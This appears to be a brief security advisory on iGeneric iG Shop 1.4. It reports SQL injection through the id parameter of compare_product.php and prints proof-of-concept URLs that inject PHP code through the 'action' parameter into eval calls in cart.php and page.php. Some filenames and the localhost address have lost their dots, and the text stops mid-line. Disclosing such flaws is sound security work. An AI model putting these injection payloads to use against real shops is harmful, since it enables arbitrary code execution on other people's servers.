SQL injection vulnerability in compare_product.php in iGeneric iG Shop 1.4 allows remote malicious users to execute arbitrary SQL commands via the id parameter.
"If eval is the answer, then you are asking the wrong question"
--Unknowen
ig-shop suffers from two eval's that can be controlled by an attacker:
127001/ig_shop/cartphp?action=;phpinfo();//
/cartphp line 692:
eval ("cart_$action();");
127001/ig_shop/pagephp?action=;phpinfo();//
/pagephp line 336:
eval ("page_$action(); ...